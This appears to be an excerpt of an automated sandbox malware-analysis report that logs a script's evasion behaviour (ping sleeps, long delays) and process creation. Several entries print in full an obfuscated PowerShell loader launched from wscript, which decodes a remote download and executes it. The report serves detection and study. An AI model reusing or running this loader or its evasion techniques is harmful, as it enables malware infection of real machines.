Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1 Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5192 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4715 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6942 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2723 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032 Thread sleep count: 6942 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020 Thread sleep count: 2723 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000007.00000002.4220569806.00000244A2622000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.% Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$srbrns = 1;$headling='substrin';$headling+='g';function fremtidsmuligheders($elmiernflatable){$uddannelsesafdelingerne=$elmiernflatable.length-$srbrns;for($elmier=5; $elmier -lt $uddannelsesafdelingerne; $elmier+=(6)){$undepreciative+=$elmiernflatable.$headling.invoke($elmier, $srbrns);}$undepreciative;}function udslyngende($barm){& ($deforming) ($barm);}$paviour=fremtidsmuligheders ' themmbentjotumulz couninonbilso erl konnahelss/ mus.5maegl.journ0enlac ci r(vesp,w moriiphthon anoddkejs,oanal wdawttsenkel emascnse,ict reof optim1kanal0nac o.eviln0 cohe;biote restwan,stibagtandigam6 nse4teleo;exist labox f,sk6 mas,4ukoll;sinus cinqur ,ntrvptafi:insta1h log2 fals1 dehu.d nsk0photo)konfo s,igmg klbbemiljichjr,mkvievaomacro/.ring2 rute0tyngd1iagtt0twirl0afste1storm0termo1hors. snrehfnucleipopparye,hoewifehftaranoc.araxthy s/ar en1abave2 orsi1ikono.dotti0wordi ';$presserendes=fremtidsmuligheders ',pittuprcisstimiaecharmrsau.e- utakap ocrgitureealbifncon,it avyt ';$hustankes=fremtidsmuligheders ' tephhrund tfootbtlim,sp glyp:respe/regie/negatoa.stir.ameliscurvgsammeiungrincheeras,ruplfejlhcproloodgnaanosmogc rivefil,hppe att nyh,skonsoit,iumnsuniocsmu t.cerv.r nsinulo.us.compucbacksokogejmh.sge/ uswiaopsens .rked.ompltspi e/projeklevera dagsrskraadcombiiimagon tritabarsel subgiforbitfloccefor.rtneedee domiradver.opsnupdebugfskabeb saer ';$agricolous=fremtidsmuligheders '.onke>sorts ';$deforming=fremtidsmuligheders ',mpudireveregobsmxabbre ';$befrogged = fremtidsmuligheders 'bas.geetiolc planhparaloolier flapp%solsya.torip catep d,owdsubc abgerbtstrenaing.n%skiin\asparblikvienebran sta,zsengei anthdtvangi.skarnt.lgaespids2stro 3 econ3ski d. grosscamoujc,terlprora smok&curta&dipsa afsjle af uc ntomh kraosalam dephl$frugt ';udslyngende (fremtidsmuligheders 'panto$treergmodiflcel,sokermab kar a bolil issa: kvalmfilmfa.niveu ilmer h,meearic rade onkodake un,e= folk(kraftcgilbemperpedmadre lifto/ mo ocpatho kalkv$no,psbhappeekanaefhalobr fnugounriggklassgun.arebygnid fleu) re i ');udslyngende (fremtidsmuligheders 'f.aar$ akshgectoglravinoopr,jbangusade orlmaler:a mrkc.ltrahdrawaadatelrm.rblmco.che aarsugrayfsnsk,bebeds rneighnneuroe apossindda=u.kla$fredshthumbubombespyromt p,rtasprinnjounckbedeaetilsyspalin.dagmas.enopphippalgr seibefritjernb(op,as$sk,inacara.gdun erk,eolis ocucchiroo vililb.itoopi,peuocells.ntar) bu.c ');$hustankes=$charmeusernes[0];udslyngende (fremtidsmuligheders 'scrof$utopignephrl tan,ov.ndfb ,pomabeakel.upli:tudbrr selvopyntetoverca nondtguariiforsko ann,n da nsall vp by nubeatmmwholep b ggezost,r.muldndubioecontisligul1elect0sto.e1 jumi=bar.knbestoeskinkw,aabe-up.eloskrmab rij,j intee pollcspatut cobw explaspowdeypres,sexcitt rosaefo esmallor.afbinnscranespec.t faun.antipwkemikebekl.bkyndecem,lslmal ximensteundown s.rntm,tab ');udslyngende (fremtidsmuligheders ' asm$peasercham ocoloutdialeaviewito
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$srbrns = 1;$headling='substrin';$headling+='g';function fremtidsmuligheders($elmiernflatable){$uddannelsesafdelingerne=$elmiernflatable.length-$srbrns;for($elmier=5; $elmier -lt $uddannelsesafdelingerne; $elmier+=(6)){$undepreciative+=$elmiernflatable.$headling.invoke($elmier, $srbrns);}$undepreciative;}function udslyngende($barm){& ($deforming) ($barm);}$paviour=fremtidsmuligheders ' themmbentjotumulz couninonbilso erl konnahelss/ mus.5maegl.journ0enlac ci r(vesp,w moriiphthon anoddkejs,oanal wdawttsenkel emascnse,ict reof optim1kanal0nac o.eviln0 cohe;biote restwan,stibagtandigam6 nse4teleo;exist labox f,sk6 mas,4ukoll;sinus cinqur ,ntrvptafi:insta1h log2 fals1 dehu.d nsk0photo)konfo s,igmg klbbemiljichjr,mkvievaomacro/.ring2 rute0tyngd1iagtt0twirl0afste1storm0termo1hors. snrehfnucleipopparye,hoewifehftaranoc.araxthy s/ar en1abave2 orsi1ikono.dotti0wordi ';$presserendes=fremtidsmuligheders ',pittuprcisstimiaecharmrsau.e- utakap ocrgitureealbifncon,it avyt ';$hustankes=fremtidsmuligheders ' tephhrund tfootbtlim,sp glyp:respe/regie/negatoa.stir.ameliscurvgsammeiungrincheeras,ruplfejlhcproloodgnaanosmogc rivefil,hppe att nyh,skonsoit,iumnsuniocsmu t.cerv.r nsinulo.us.compucbacksokogejmh.sge/ uswiaopsens .rked.ompltspi e/projeklevera dagsrskraadcombiiimagon tritabarsel subgiforbitfloccefor.rtneedee domiradver.opsnupdebugfskabeb saer ';$agricolous=fremtidsmuligheders '.onke>sorts ';$deforming=fremtidsmuligheders ',mpudireveregobsmxabbre ';$befrogged = fremtidsmuligheders 'bas.geetiolc planhparaloolier flapp%solsya.torip catep d,owdsubc abgerbtstrenaing.n%skiin\asparblikvienebran sta,zsengei anthdtvangi.skarnt.lgaespids2stro 3 econ3ski d. grosscamoujc,terlprora smok&curta&dipsa afsjle af uc ntomh kraosalam dephl$frugt ';udslyngende (fremtidsmuligheders 'panto$treergmodiflcel,sokermab kar a bolil issa: kvalmfilmfa.niveu ilmer h,meearic rade onkodake un,e= folk(kraftcgilbemperpedmadre lifto/ mo ocpatho kalkv$no,psbhappeekanaefhalobr fnugounriggklassgun.arebygnid fleu) re i ');udslyngende (fremtidsmuligheders 'f.aar$ akshgectoglravinoopr,jbangusade orlmaler:a mrkc.ltrahdrawaadatelrm.rblmco.che aarsugrayfsnsk,bebeds rneighnneuroe apossindda=u.kla$fredshthumbubombespyromt p,rtasprinnjounckbedeaetilsyspalin.dagmas.enopphippalgr seibefritjernb(op,as$sk,inacara.gdun erk,eolis ocucchiroo vililb.itoopi,peuocells.ntar) bu.c ');$hustankes=$charmeusernes[0];udslyngende (fremtidsmuligheders 'scrof$utopignephrl tan,ov.ndfb ,pomabeakel.upli:tudbrr selvopyntetoverca nondtguariiforsko ann,n da nsall vp by nubeatmmwholep b ggezost,r.muldndubioecontisligul1elect0sto.e1 jumi=bar.knbestoeskinkw,aabe-up.eloskrmab rij,j intee pollcspatut cobw explaspowdeypres,sexcitt rosaefo esmallor.afbinnscranespec.t faun.antipwkemikebekl.bkyndecem,lslmal ximensteundown s.rntm,tab ');udslyngende (fremtidsmuligheders ' asm$peasercham ocoloutdialeaviewito
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$srbrns = 1;$headling='substrin';$headling+='g';function fremtidsmuligheders($elmiernflatable){$uddannelsesafdelingerne=$elmiernflatable.length-$srbrns;for($elmier=5; $elmier -lt $uddannelsesafdelingerne; $elmier+=(6)){$undepreciative+=$elmiernflatable.$headling.invoke($elmier, $srbrns);}$undepreciative;}function udslyngende($barm){& ($deforming) ($barm);}$paviour=fremtidsmuligheders ' themmbentjotumulz couninonbilso erl konnahelss/ mus.5maegl.journ0enlac ci r(vesp,w moriiphthon anoddkejs,oanal wdawttsenkel emascnse,ict reof optim1kanal0nac o.eviln0 cohe;biote restwan,stibagtandigam6 nse4teleo;exist labox f,sk6 mas,4ukoll;sinus cinqur ,ntrvptafi:insta1h log2 fals1 dehu.d nsk0photo)konfo s,igmg klbbemiljichjr,mkvievaomacro/.ring2 rute0tyngd1iagtt0twirl0afste1storm0termo1hors. snrehfnucleipopparye,hoewifehftaranoc.araxthy s/ar en1abave2 orsi1ikono.dotti0wordi ';$presserendes=fremtidsmuligheders ',pittuprcisstimiaecharmrsau.e- utakap ocrgitureealbifncon,it avyt ';$hustankes=fremtidsmuligheders ' tephhrund tfootbtlim,sp glyp:respe/regie/negatoa.stir.ameliscurvgsammeiungrincheeras,ruplfejlhcproloodgnaanosmogc rivefil,hppe att nyh,skonsoit,iumnsuniocsmu t.cerv.r nsinulo.us.compucbacksokogejmh.sge/ uswiaopsens .rked.ompltspi e/projeklevera dagsrskraadcombiiimagon tritabarsel subgiforbitfloccefor.rtneedee domiradver.opsnupdebugfskabeb saer ';$agricolous=fremtidsmuligheders '.onke>sorts ';$deforming=fremtidsmuligheders ',mpudireveregobsmxabbre ';$befrogged = fremtidsmuligheders 'bas.geetiolc planhparaloolier flapp%solsya.torip catep d,owdsubc abgerbtstrenaing.n%skiin\asparblikvienebran sta,zsengei anthdtvangi.skarnt.lgaespids2stro 3 econ3ski d. grosscamoujc,terlprora smok&curta&dipsa afsjle af uc ntomh kraosalam dephl$frugt ';udslyngende (fremtidsmuligheders 'panto$treergmodiflcel,sokermab kar a bolil issa: kvalmfilmfa.niveu ilmer h,meearic rade onkodake un,e= folk(kraftcgilbemperpedmadre lifto/ mo ocpatho kalkv$no,psbhappeekanaefhalobr fnugounriggklassgun.arebygnid fleu) re i ');udslyngende (fremtidsmuligheders 'f.aar$ akshgectoglravinoopr,jbangusade orlmaler:a mrkc.ltrahdrawaadatelrm.rblmco.che aarsugrayfsnsk,bebeds rneighnneuroe apossindda=u.kla$fredshthumbubombespyromt p,rtasprinnjounckbedeaetilsyspalin.dagmas.enopphippalgr seibefritjernb(op,as$sk,inacara.gdun erk,eolis ocucchiroo vililb.itoopi,peuocells.ntar) bu.c ');$hustankes=$charmeusernes[0];udslyngende (fremtidsmuligheders 'scrof$utopignephrl tan,ov.ndfb ,pomabeakel.upli:tudbrr selvopyntetoverca nondtguariiforsko ann,n da nsall vp by nubeatmmwholep b ggezost,r.muldndubioecontisligul1elect0sto.e1 jumi=bar.knbestoeskinkw,aabe-up.eloskrmab rij,j intee pollcspatut cobw explaspowdeypres,sexcitt rosaefo esmallor.afbinnscranespec.t faun.antipwkemikebekl.bkyndecem,lslmal ximensteundown s.rntm,tab ');udslyngende (fremtidsmuligheders ' asm$peasercham ocoloutdialeaviewito Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$srbrns = 1;$headling='substrin';$headling+='g';function fremtidsmuligheders($elmiernflatable){$uddannelsesafdelingerne=$elmiernflatable.length-$srbrns;for($elmier=5; $elmier -lt $uddannelsesafdelingerne; $elmier+=(6)){$undepreciative+=$elmiernflatable.$headling.invoke($elmier, $srbrns);}$undepreciative;}function udslyngende($barm){& ($deforming) ($barm);}$paviour=fremtidsmuligheders ' themmbentjotumulz couninonbilso erl konnahelss/ mus.5maegl.journ0enlac ci r(vesp,w moriiphthon anoddkejs,oanal wdawttsenkel emascnse,ict reof optim1kanal0nac o.eviln0 cohe;biote restwan,stibagtandigam6 nse4teleo;exist labox f,sk6 mas,4ukoll;sinus cinqur ,ntrvptafi:insta1h log2 fals1 dehu.d nsk0photo)konfo s,igmg klbbemiljichjr,mkvievaomacro/.ring2 rute0tyngd1iagtt0twirl0afste1storm0termo1hors. snrehfnucleipopparye,hoewifehftaranoc.araxthy s/ar en1abave2 orsi1ikono.dotti0wordi ';$presserendes=fremtidsmuligheders ',pittuprcisstimiaecharmrsau.e- utakap ocrgitureealbifncon,it avyt ';$hustankes=fremtidsmuligheders ' tephhrund tfootbtlim,sp glyp:respe/regie/negatoa.stir.ameliscurvgsammeiungrincheeras,ruplfejlhcproloodgnaanosmogc rivefil,hppe att nyh,skonsoit,iumnsuniocsmu t.cerv.r nsinulo.us.compucbacksokogejmh.sge/ uswiaopsens .rked.ompltspi e/projeklevera dagsrskraadcombiiimagon tritabarsel subgiforbitfloccefor.rtneedee domiradver.opsnupdebugfskabeb saer ';$agricolous=fremtidsmuligheders '.onke>sorts ';$deforming=fremtidsmuligheders ',mpudireveregobsmxabbre ';$befrogged = fremtidsmuligheders 'bas.geetiolc planhparaloolier flapp%solsya.torip catep d,owdsubc abgerbtstrenaing.n%skiin\asparblikvienebran sta,zsengei anthdtvangi.skarnt.lgaespids2stro 3 econ3ski d. grosscamoujc,terlprora smok&curta&dipsa afsjle af uc ntomh kraosalam dephl$frugt ';udslyngende (fremtidsmuligheders 'panto$treergmodiflcel,sokermab kar a bolil issa: kvalmfilmfa.niveu ilmer h,meearic rade onkodake un,e= folk(kraftcgilbemperpedmadre lifto/ mo ocpatho kalkv$no,psbhappeekanaefhalobr fnugounriggklassgun.arebygnid fleu) re i ');udslyngende (fremtidsmuligheders 'f.aar$ akshgectoglravinoopr,jbangusade orlmaler:a mrkc.ltrahdrawaadatelrm.rblmco.che aarsugrayfsnsk,bebeds rneighnneuroe apossindda=u.kla$fredshthumbubombespyromt p,rtasprinnjounckbedeaetilsyspalin.dagmas.enopphippalgr seibefritjernb(op,as$sk,inacara.gdun erk,eolis ocucchiroo vililb.itoopi,peuocells.ntar) bu.c ');$hustankes=$charmeusernes[0];udslyngende (fremtidsmuligheders 'scrof$utopignephrl tan,ov.ndfb ,pomabeakel.upli:tudbrr selvopyntetoverca nondtguariiforsko ann,n da nsall vp by nubeatmmwholep b ggezost,r.muldndubioecontisligul1elect0sto.e1 jumi=bar.knbestoeskinkw,aabe-up.eloskrmab rij,j intee pollcspatut cobw explaspowdeypres,sexcitt rosaefo esmallor.afbinnscranespec.t faun.antipwkemikebekl.bkyndecem,lslmal ximensteundown s.rntm,tab ');udslyngende (fremtidsmuligheders ' asm$peasercham ocoloutdialeaviewito Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
